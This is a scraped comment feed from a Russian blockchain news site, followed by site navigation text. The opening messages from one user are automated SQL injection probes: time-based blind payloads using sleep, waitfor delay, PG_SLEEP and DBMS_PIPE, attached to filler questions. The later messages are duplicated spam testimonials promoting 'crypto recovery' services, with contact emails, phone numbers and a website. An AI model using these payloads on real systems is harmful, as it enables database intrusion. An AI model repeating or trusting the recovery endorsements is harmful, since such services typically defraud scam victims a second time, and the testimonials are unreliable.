can I ask you a question please?0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
09.10.25 08:23 pHqghUme

can I ask you a question please?
09.10.25 08:23 pHqghUme

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
09.10.25 08:24 pHqghUme

is it ok if I upload an image?
09.10.25 08:24 pHqghUme

e
09.10.25 08:24 pHqghUme

can I ask you a question please?-1 waitfor delay '0:0:15' --
09.10.25 08:25 pHqghUme

is it ok if I upload an image?
09.10.25 08:25 pHqghUme

e
09.10.25 08:25 pHqghUme

e
09.10.25 08:25 pHqghUme

e
09.10.25 08:25 pHqghUme

can I ask you a question please?9IDOn7ik'; waitfor delay '0:0:15' --
09.10.25 08:26 pHqghUme

can I ask you a question please?MQOVJH7P' OR 921=(SELECT 921 FROM PG_SLEEP(15))--
09.10.25 08:26 pHqghUme

e
09.10.25 08:27 pHqghUme

can I ask you a question please?64e1xqge') OR 107=(SELECT 107 FROM PG_SLEEP(15))--
09.10.25 08:27 pHqghUme

can I ask you a question please?ODDe7Ze5')) OR 82=(SELECT 82 FROM PG_SLEEP(15))--
09.10.25 08:28 pHqghUme

can I ask you a question please?'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
09.10.25 08:28 pHqghUme

can I ask you a question please?'"
09.10.25 08:28 pHqghUme

can I ask you a question please?
09.10.25 08:28 pHqghUme

@@olQP6
09.10.25 08:28 pHqghUme

(select 198766*667891 from DUAL)
09.10.25 08:28 pHqghUme

(select 198766*667891)
09.10.25 08:30 pHqghUme

is it ok if I upload an image?
09.10.25 08:33 pHqghUme

can I ask you a question please?
09.10.25 08:34 pHqghUme

can I ask you a question please?
09.10.25 08:34 pHqghUme

if(now()=sysdate(),sleep(15),0)
09.10.25 08:35 pHqghUme

e
09.10.25 08:36 pHqghUme

is it ok if I upload an image?
09.10.25 08:36 pHqghUme

is it ok if I upload an image?
09.10.25 08:37 pHqghUme

is it ok if I upload an image?
09.10.25 08:37 pHqghUme

is it ok if I upload an image?
09.10.25 08:37 pHqghUme

e
09.10.25 08:37 pHqghUme

e
09.10.25 08:40 pHqghUme

can I ask you a question please?
09.10.25 08:40 pHqghUme

is it ok if I upload an image?
09.10.25 08:41 pHqghUme

e
09.10.25 08:41 pHqghUme

can I ask you a question please?
09.10.25 08:42 pHqghUme

can I ask you a question please?
09.10.25 08:42 pHqghUme

is it ok if I upload an image?
09.10.25 08:42 pHqghUme

e
09.10.25 11:05 marcushenderson624

Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
09.10.25 11:05 marcushenderson624

Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
09.10.25 11:05 marcushenderson624

Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
09.10.25 11:05 marcushenderson624

Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
11.10.25 04:41 luciajessy3

Don’t be deceived by different testimonies online that is most likely wrong. I have made use of several recovery options that got me disappointed at the end of the day but I must confess that the tech genius I eventually found is the best out here. It’s better you devise your time to find the valid professional that can help you recover your stolen or lost crypto such as bitcoins rather than falling victim of other amateur hackers that cannot get the job done. ADAMWILSON . TRADING @ CONSULTANT COM / WHATSAPP ; +1 (603) 702 ( 4335 ) is the most reliable and authentic blockchain tech expert you can work with to recover what you lost to scammers. They helped me get back on my feet and I’m very grateful for that. Contact their email today to recover your lost coins ASAP…
11.10.25 10:44 Tonerdomark

A thief took my Dogecoin and wrecked my life. Then Mr. Sylvester stepped in and changed everything. He got back €211,000 for me, every single cent of my gains. His calm confidence and strong tech skills rebuilt my trust. Thanks to him, I recovered my cash with no issues. After months of stress, I felt huge relief. I had full faith in him. If a scam stole your money, reach out to him today at { yt7cracker@gmail . com } His help sparked my full turnaround.
01:12 harristhomas7376

"In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
01:12 harristhomas7376

"In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

Для участия в Чате вам необходим бесплатный аккаунт pro-blockchain.com Войти Регистрация

Н Новости

Тестирование качества работы RAG. Описание и сравнение метрик

LLM-Based Context Recall

Non LLM Based Context Recall

Похожие новости

Как Senior управляют контекстным окном LLM

Аналитики обозначили причины обвала крипторынка

ИИ кодинг не работает

Основной вопрос философии: новый взгляд

.ap: удобный для ИИ формат патчей, который экономит мне часы

Топ вопросов с Data Science собеседований: Деревья и ансамбли, кластеризация, метрические модели

Н Новости

Тестирование качества работы RAG. Описание и сравнение метрик

LLM-Based Context Recall

Non LLM Based Context Recall

Похожие новости

Как Senior управляют контекстным окном LLM

Аналитики обозначили причины обвала крипторынка

ИИ кодинг не работает

Основной вопрос философии: новый взгляд

.ap: удобный для ИИ формат патчей, который экономит мне часы

Топ вопросов с Data Science собеседований: Деревья и ансамбли, кластеризация, метрические модели

Оставайтесь на связи